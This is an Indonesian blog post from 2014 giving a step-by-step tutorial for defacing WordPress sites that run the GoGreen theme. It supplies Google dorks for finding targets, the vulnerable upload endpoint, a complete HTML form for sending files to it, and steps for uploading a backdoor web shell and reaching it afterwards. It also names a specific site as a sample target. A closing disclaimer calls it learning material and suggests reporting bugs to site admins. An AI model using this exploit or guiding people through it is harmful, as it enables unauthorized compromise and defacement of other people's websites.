Wednesday, 12 November 2014

Tutorial Deface Website With WordPress GoGreen File Upload Vulnerability

Gantengers - Tutorial Deface Website Dengan WordPress GoGreen File Upload Vulnerability, Tutorial Deface kali ini ditekankan kepada website berbasis wordpress dengan tehnik file upoud vulnerability secara umum dan berdasarkan alurnya bisa saya beberkan beberapa penjelasan sedikit mengenai tutorial ini, sembari menambah pengetahuan anda sebelum melakukan tutorial ini, Cross-Site Request Forgery (CSRF) adalah media yang akan kita gunakan untuk melakukan file uploud pada form didalam website yang menggunakan theme GoGreen.

Selanjutnya saya akan sedikit menjelaskan tentang alur deface website kali ini dimana kita akan menggunakan dork google untuk mencari target website dan mengganti bagian belakang url dengan exploit yang telah saya bagikan guna mendapatkan akses uploud form yang nantinya kita gunakan untuk uploud shell selanjutnya kita bisa mengakses website orang lain dengan shell backdoor dan kita bisa melakukan apa saja tapi perlu diingat ini hanya sebagai materi pembelajaran dan biasakan mengembangkan dork untuk mendapat hasil pencarian yang lebih baik lagi. Nah sekarang mari beranjak dan melanjutkan ke tutorial berikut sebelum melakukan tutorial ini silahkan anda cari shell dahulu untuk dapat membuat form uploud :

Bahan-Bahan Tempur

Goolge Dork
inurl:"/wp-content/themes/gogreen/"
inurl:/wp-content/themes/ut-gogreen/ site:com
inurl:/wp-content/themes/gogreen/ site:com

Exploit
/wp-content/themes/gogreen/addpress/includes/ap_fileupload.php
Source Code (Form Uploud)
<h1>
Gantengers GoGreen WordPress Exploit</h1>
<form action="http://www.[target].com/wp-content/themes/gogreen/addpress/includes/ap_fileupload.php" enctype="multipart/form-data" method="post">
Home Url: <input name="homeurl" type="text" value="http://" />

Template: <input name="template" type="text" value="gogreen" />

Dir1: <input name="themeroot" type="text" />

Dir2: <input name="dir" type="text" />

File: <input name="file_upload" type="file" />

<input type="submit" value="upload" />
</form>
lalu save (all files) dengan nama gantengers.html dan lanjut ke tutorial

 WordPress GoGreen File Upload Vulnerability

Silahkan Gunakan google dork diatas pilih salah satu saya ambil contoh saya pilih google dork inurl:"/wp-content/themes/gogreen/" lalu saya memilih target dan mendapatkan website http://www.kcrunciman.com/ nah kalau di url belakangnya ada url halaman hapus aja copy index aja bro 
selanjutnya buka file gantengers.html terus edit www.target.com ganti dengan target yang kita dapatkan jadinya http://www.kcrunciman.com/wp-content/themes/gogreen/addpress/includes/ap_fileupload.php dan save lalu buka lewat mozila atau chrome maka tampilannya akan seperti dibawah ini dan isikan form nya harus sama dengan gambar dibawah dan uploud shell kalian, belum punya shell klik disini .

Dan Jika sukses maka shell akan terbuka seperti gambar dibawah ini sesuai dengan shell yang anda gunakan cmiw dan untuk mengakses shell jika sudah teruploud
http://www.target.com/wp-content/themes/ut-gogreen/addpress/includes/gantengers/shell.php

Dan Jika Anda mengalami masalah dalam mempraktekan tutorial ini bisa bertanya di kolom komentar dibawah dan jika belum menemukan target terus mencari karena bukan hanya anda yang mempraktekan tutorial ini dan silahkan mengembangkan dork seperti yang saya katakan tadi.

Seperti Yang sudah saya tekankan sebelumnya "ini hanya bahan materi pembelajaran saya dan blog ini tidak bertanggung jawab atas apa yang anda lakukan itu semua diluar kuasa saya dan dosa ditanggung pengguna tutorial ini terima kasih" alangkah baiknya kita memberi tahu bug website ini langsung kepada adminnya daripada meretasnya dan ada 2 kemungkinan anda akan mendapat pahala amin xixixi

 
function hideNow(e) { if (e.target.id == 'ac-wrapper') document.getElementById('ac-wrapper').style.display = 'none'; }